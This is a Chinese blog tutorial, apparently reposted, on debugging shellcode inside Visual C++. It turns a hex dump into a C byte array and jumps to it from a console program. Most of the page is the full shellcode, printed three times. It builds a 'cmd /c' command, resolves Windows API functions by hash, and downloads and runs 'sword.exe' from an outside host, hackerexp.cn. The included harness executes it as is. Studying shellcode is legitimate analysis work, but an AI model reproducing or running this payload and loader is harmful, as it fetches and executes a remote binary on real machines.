用VC 调试 Shellcode 方法
来源:互联网 发布:专业seo公司 编辑:程序博客网 时间:2024/05/02 02:03
经常会在网上看到公布出来的shellcode,都是二进制的文件,可以把这个二进制文件通过反汇编工具反汇编出汇编代码, 不过也可以的通过VC来调试shellcode。
比如在网上看到了这样的shellcode :
8B EC 64 8B 15 30 00 00 00 8D 52 03 80 3A 01 0F 84 C8 00 00 00 C6 02 01 E8 4B 01 00 00 68 00 03 00 00 6A 00 FF D0 B9 00 03 00 00 8B F8 EB 05 5E F3 A4 FF D0 E8 F6 FF FF FF EB 17 57 E8 8B 01 00 00 8B F8 33 C9 49 33 C0 B0 C3 FC F2 AE 8D 47 FF 5F C3 E9 F5 01 00 00 5B 81 EC 14 01 00 00 8B D4 3E C7 02 63 6D 64 20 3E C7 42 04 2F 63 20 22 83 C2 08 33 C0 50 50 68 04 01 00 00 52 53 50 E8 21 01 00 00 FF D0 8B FC 8B C7 83 C0 08 3E 8A 18 84 DB 74 03 40 EB F6 3E C6 00 22 33 D2 3E 88 50 01 83 EC 54 33 C0 33 DB 8B CC 83 F8 54 7D 09 3E 89 1C 01 83 C0 04 EB F2 8B CC 8B D9 83 C3 10 33 C0 3E C7 43 2C 01 00 00 00 51 53 50 50 50 50 50 50 57 50 E8 B9 00 00 00 E8 04 00 00 00 90 6A 00 C3 80 38 55 74 0F 81 78 05 90 90 90 90 74 06 55 8B EC 8D 40 05 FF E0 68 6F 6E 00 00 68 75 72 4C 6D EB 12 8D 44 24 04 50 E8 2F FF FF FF 50 E8 A6 00 00 00 EB CC E8 E9 FF FF FF 83 C4 08 C3 6A 6C 68 6E 74 64 6C EB 12 8D 44 24 04 50 E8 0B FF FF FF 50 E8 82 00 00 00 EB A8 E8 E9 FF FF FF 83 C4 08 C3 68 33 32 32 32 68 75 73 65 72 EB 12 8D 44 24 04 50 E8 E4 FE FF FF 50 E8 5B 00 00 00 EB 81 E8 E9 FF FF FF 83 C4 08 C3 E8 5F 00 00 00 68 EC 97 03 0C 50 E8 7A 00 00 00 83 C4 08 C3 E8 4B 00 00 00 68 AA FC 0D 7C 50 E8 66 00 00 00 83 C4 08 C3 E8 37 00 00 00 68 72 FE B3 16 50 E8 52 00 00 00 83 C4 08 C3 E8 4D FF FF FF 68 4F EF 4F 05 50 E8 3E 00 00 00 83 C4 08 C3 E8 0F 00 00 00 68 8E 4E 0E EC 50 E8 2A 00 00 00 83 C4 08 C3 33 C0 64 8B 40 30 85 C0 78 10 3E 8B 40 0C 3E 8B 70 1C AD 3E 8B 40 08 C3 EB 0B 3E 8B 40 34 83 C0 7C 3E 8B 40 3C C3 60 36 8B 6C 24 24 36 8B 45 3C 36 8B 54 05 78 03 D5 3E 8B 4A 18 3E 8B 5A 20 03 DD E3 3A 49 3E 8B 34 8B 03 F5 33 FF 33 C0 FC AC 84 C0 74 07 C1 CF 0D 03 F8 EB F4 36 3B 7C 24 28 75 DF 3E 8B 5A 24 03 DD 66 3E 8B 0C 4B 3E 8B 5A 1C 03 DD 3E 8B 04 8B 03 C5 36 89 44 24 1C 61 C3 E8 06 FE FF FF 68 54 54 70 3A 2F 2F 77 77 77 2E 68 61 63 6B 65 72 65 78 70 2E 63 6E 2F 73 77 6F 72 64 2E 65 78 65 00
把二进制的文件保存到文件中,通过VC 2005的正则表达式替换功能,替换成为:
0x8B, 0xEC, 0x64, 0x8B, 0x15, 0x30, 0x00, 0x00, 0x00, 0x8D, 0x52, 0x03, 0x80, 0x3A, 0x01, 0x0F, 0x84, 0xC8, 0x00, 0x00, 0x00, 0xC6, 0x02, 0x01, 0xE8, 0x4B, 0x01, 0x00, 0x00, 0x68, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x00, 0xFF, 0xD0, 0xB9, 0x00, 0x03, 0x00, 0x00, 0x8B, 0xF8, 0xEB, 0x05, 0x5E, 0xF3, 0xA4, 0xFF, 0xD0, 0xE8, 0xF6, 0xFF, 0xFF, 0xFF, 0xEB, 0x17, 0x57, 0xE8, 0x8B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x33, 0xC9, 0x49, 0x33, 0xC0, 0xB0, 0xC3, 0xFC, 0xF2, 0xAE, 0x8D, 0x47, 0xFF, 0x5F, 0xC3, 0xE9, 0xF5, 0x01, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x14, 0x01, 0x00, 0x00, 0x8B, 0xD4, 0x3E, 0xC7, 0x02, 0x63, 0x6D, 0x64, 0x20, 0x3E, 0xC7, 0x42, 0x04, 0x2F, 0x63, 0x20, 0x22, 0x83, 0xC2, 0x08, 0x33, 0xC0, 0x50, 0x50, 0x68, 0x04, 0x01, 0x00, 0x00, 0x52, 0x53, 0x50, 0xE8, 0x21, 0x01, 0x00, 0x00, 0xFF, 0xD0, 0x8B, 0xFC, 0x8B, 0xC7, 0x83, 0xC0, 0x08, 0x3E, 0x8A, 0x18, 0x84, 0xDB, 0x74, 0x03, 0x40, 0xEB, 0xF6, 0x3E, 0xC6, 0x00, 0x22, 0x33, 0xD2, 0x3E, 0x88, 0x50, 0x01, 0x83, 0xEC, 0x54, 0x33, 0xC0, 0x33, 0xDB, 0x8B, 0xCC, 0x83, 0xF8, 0x54, 0x7D, 0x09, 0x3E, 0x89, 0x1C, 0x01, 0x83, 0xC0, 0x04, 0xEB, 0xF2, 0x8B, 0xCC, 0x8B, 0xD9, 0x83, 0xC3, 0x10, 0x33, 0xC0, 0x3E, 0xC7, 0x43, 0x2C, 0x01, 0x00, 0x00, 0x00, 0x51, 0x53, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 0x57, 0x50, 0xE8, 0xB9, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x90, 0x6A, 0x00, 0xC3, 0x80, 0x38, 0x55, 0x74, 0x0F, 0x81, 0x78, 0x05, 0x90, 0x90, 0x90, 0x90, 0x74, 0x06, 0x55, 0x8B, 0xEC, 0x8D, 0x40, 0x05, 0xFF, 0xE0, 0x68, 0x6F, 0x6E, 0x00, 0x00, 0x68, 0x75, 0x72, 0x4C, 0x6D, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x2F, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xA6, 0x00, 0x00, 0x00, 0xEB, 0xCC, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x6A, 0x6C, 0x68, 0x6E, 0x74, 0x64, 0x6C, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x0B, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0x82, 0x00, 0x00, 0x00, 0xEB, 0xA8, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x68, 0x33, 0x32, 0x32, 0x32, 0x68, 0x75, 0x73, 0x65, 0x72, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x5B, 0x00, 0x00, 0x00, 0xEB, 0x81, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x5F, 0x00, 0x00, 0x00, 0x68, 0xEC, 0x97, 0x03, 0x0C, 0x50, 0xE8, 0x7A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4B, 0x00, 0x00, 0x00, 0x68, 0xAA, 0xFC, 0x0D, 0x7C, 0x50, 0xE8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x37, 0x00, 0x00, 0x00, 0x68, 0x72, 0xFE, 0xB3, 0x16, 0x50, 0xE8, 0x52, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4D, 0xFF, 0xFF, 0xFF, 0x68, 0x4F, 0xEF, 0x4F, 0x05, 0x50, 0xE8, 0x3E, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x68, 0x8E, 0x4E, 0x0E, 0xEC, 0x50, 0xE8, 0x2A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0x33, 0xC0, 0x64, 0x8B, 0x40, 0x30, 0x85, 0xC0, 0x78, 0x10, 0x3E, 0x8B, 0x40, 0x0C, 0x3E, 0x8B, 0x70, 0x1C, 0xAD, 0x3E, 0x8B, 0x40, 0x08, 0xC3, 0xEB, 0x0B, 0x3E, 0x8B, 0x40, 0x34, 0x83, 0xC0, 0x7C, 0x3E, 0x8B, 0x40, 0x3C, 0xC3, 0x60, 0x36, 0x8B, 0x6C, 0x24, 0x24, 0x36, 0x8B, 0x45, 0x3C, 0x36, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x3E, 0x8B, 0x4A, 0x18, 0x3E, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0xE3, 0x3A, 0x49, 0x3E, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x36, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDF, 0x3E, 0x8B, 0x5A, 0x24, 0x03, 0xDD, 0x66, 0x3E, 0x8B, 0x0C, 0x4B, 0x3E, 0x8B, 0x5A, 0x1C, 0x03, 0xDD, 0x3E, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0x36, 0x89, 0x44, 0x24, 0x1C, 0x61, 0xC3, 0xE8, 0x06, 0xFE, 0xFF, 0xFF, 0x68, 0x54, 0x54, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x68, 0x61, 0x63, 0x6B, 0x65, 0x72, 0x65, 0x78, 0x70, 0x2E, 0x63, 0x6E, 0x2F, 0x73, 0x77, 0x6F, 0x72, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00,
所用的替换规则如下:Find What : {[0-9a-fA-F][0-9a-fA-F]} , Replace with : 0x/1,
之后在vc 创建一个基于console 的项目,例如:
unsigned char pdata[] = { 0x8B, 0xEC, 0x64, 0x8B, 0x15, 0x30, 0x00, 0x00, 0x00, 0x8D, 0x52, 0x03, 0x80, 0x3A, 0x01, 0x0F, 0x84, 0xC8, 0x00, 0x00, 0x00, 0xC6, 0x02, 0x01, 0xE8, 0x4B, 0x01, 0x00, 0x00, 0x68, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x00, 0xFF, 0xD0, 0xB9, 0x00, 0x03, 0x00, 0x00, 0x8B, 0xF8, 0xEB, 0x05, 0x5E, 0xF3, 0xA4, 0xFF, 0xD0, 0xE8, 0xF6, 0xFF, 0xFF, 0xFF, 0xEB, 0x17, 0x57, 0xE8, 0x8B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x33, 0xC9, 0x49, 0x33, 0xC0, 0xB0, 0xC3, 0xFC, 0xF2, 0xAE, 0x8D, 0x47, 0xFF, 0x5F, 0xC3, 0xE9, 0xF5, 0x01, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x14, 0x01, 0x00, 0x00, 0x8B, 0xD4, 0x3E, 0xC7, 0x02, 0x63, 0x6D, 0x64, 0x20, 0x3E, 0xC7, 0x42, 0x04, 0x2F, 0x63, 0x20, 0x22, 0x83, 0xC2, 0x08, 0x33, 0xC0, 0x50, 0x50, 0x68, 0x04, 0x01, 0x00, 0x00, 0x52, 0x53, 0x50, 0xE8, 0x21, 0x01, 0x00, 0x00, 0xFF, 0xD0, 0x8B, 0xFC, 0x8B, 0xC7, 0x83, 0xC0, 0x08, 0x3E, 0x8A, 0x18, 0x84, 0xDB, 0x74, 0x03, 0x40, 0xEB, 0xF6, 0x3E, 0xC6, 0x00, 0x22, 0x33, 0xD2, 0x3E, 0x88, 0x50, 0x01, 0x83, 0xEC, 0x54, 0x33, 0xC0, 0x33, 0xDB, 0x8B, 0xCC, 0x83, 0xF8, 0x54, 0x7D, 0x09, 0x3E, 0x89, 0x1C, 0x01, 0x83, 0xC0, 0x04, 0xEB, 0xF2, 0x8B, 0xCC, 0x8B, 0xD9, 0x83, 0xC3, 0x10, 0x33, 0xC0, 0x3E, 0xC7, 0x43, 0x2C, 0x01, 0x00, 0x00, 0x00, 0x51, 0x53, 0x50, 0x50, 0x50, 0x50, 0x50, 0x50, 0x57, 0x50, 0xE8, 0xB9, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x90, 0x6A, 0x00, 0xC3, 0x80, 0x38, 0x55, 0x74, 0x0F, 0x81, 0x78, 0x05, 0x90, 0x90, 0x90, 0x90, 0x74, 0x06, 0x55, 0x8B, 0xEC, 0x8D, 0x40, 0x05, 0xFF, 0xE0, 0x68, 0x6F, 0x6E, 0x00, 0x00, 0x68, 0x75, 0x72, 0x4C, 0x6D, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x2F, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xA6, 0x00, 0x00, 0x00, 0xEB, 0xCC, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x6A, 0x6C, 0x68, 0x6E, 0x74, 0x64, 0x6C, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0x0B, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0x82, 0x00, 0x00, 0x00, 0xEB, 0xA8, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0x68, 0x33, 0x32, 0x32, 0x32, 0x68, 0x75, 0x73, 0x65, 0x72, 0xEB, 0x12, 0x8D, 0x44, 0x24, 0x04, 0x50, 0xE8, 0xE4, 0xFE, 0xFF, 0xFF, 0x50, 0xE8, 0x5B, 0x00, 0x00, 0x00, 0xEB, 0x81, 0xE8, 0xE9, 0xFF, 0xFF, 0xFF, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x5F, 0x00, 0x00, 0x00, 0x68, 0xEC, 0x97, 0x03, 0x0C, 0x50, 0xE8, 0x7A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4B, 0x00, 0x00, 0x00, 0x68, 0xAA, 0xFC, 0x0D, 0x7C, 0x50, 0xE8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x37, 0x00, 0x00, 0x00, 0x68, 0x72, 0xFE, 0xB3, 0x16, 0x50, 0xE8, 0x52, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x4D, 0xFF, 0xFF, 0xFF, 0x68, 0x4F, 0xEF, 0x4F, 0x05, 0x50, 0xE8, 0x3E, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0xE8, 0x0F, 0x00, 0x00, 0x00, 0x68, 0x8E, 0x4E, 0x0E, 0xEC, 0x50, 0xE8, 0x2A, 0x00, 0x00, 0x00, 0x83, 0xC4, 0x08, 0xC3, 0x33, 0xC0, 0x64, 0x8B, 0x40, 0x30, 0x85, 0xC0, 0x78, 0x10, 0x3E, 0x8B, 0x40, 0x0C, 0x3E, 0x8B, 0x70, 0x1C, 0xAD, 0x3E, 0x8B, 0x40, 0x08, 0xC3, 0xEB, 0x0B, 0x3E, 0x8B, 0x40, 0x34, 0x83, 0xC0, 0x7C, 0x3E, 0x8B, 0x40, 0x3C, 0xC3, 0x60, 0x36, 0x8B, 0x6C, 0x24, 0x24, 0x36, 0x8B, 0x45, 0x3C, 0x36, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x3E, 0x8B, 0x4A, 0x18, 0x3E, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0xE3, 0x3A, 0x49, 0x3E, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x36, 0x3B, 0x7C, 0x24, 0x28, 0x75, 0xDF, 0x3E, 0x8B, 0x5A, 0x24, 0x03, 0xDD, 0x66, 0x3E, 0x8B, 0x0C, 0x4B, 0x3E, 0x8B, 0x5A, 0x1C, 0x03, 0xDD, 0x3E, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0x36, 0x89, 0x44, 0x24, 0x1C, 0x61, 0xC3, 0xE8, 0x06, 0xFE, 0xFF, 0xFF, 0x68, 0x54, 0x54, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x68, 0x61, 0x63, 0x6B, 0x65, 0x72, 0x65, 0x78, 0x70, 0x2E, 0x63, 0x6E, 0x2F, 0x73, 0x77, 0x6F, 0x72, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00 };
int _tmain(int argc,_TCHAR* argv[])
{
__asm
{
mov eax, offset pdata
jmp eax
}
return 0;
}
这样就可以在VC 的IDE 环境下面调试这个shellcode 了,感觉很方便。
- 用VC 调试 Shellcode 方法
- shellcode 调试
- 调试ShellCode
- ShellCode的调试方法和常见问题的解决方法
- ShellCode的调试方法和常见问题的解决方法
- VC调试方法
- VC调试方法
- VC++ 调试方法总结
- VC调试方法
- VC调试方法大全!
- VC调试方法
- VC调试方法大全
- VC调试方法大全
- VC调试方法大全
- VC调试DLL方法
- VC调试方法大全
- VC调试方法大全
- Vc基本调试方法
- 史上最强的学生zz
- 理想、激情、生存—— 一位技术管理人员的20年工作经历和感悟
- C#.NET操作数据库通用类(MS SQL Server篇)
- 浅谈DB2数据库的备份与恢复
- DB2:数据同步方面的经验
- 用VC 调试 Shellcode 方法
- 单骑破百
- 人民币小写金额转大写
- WinLogon事件通知包编程
- 人民币小写金额转大写
- 人民币小写金额转大写
- 在ASP.NET页面中使用SolpartMenu控件
- 第一篇日志
- 老公生存手册
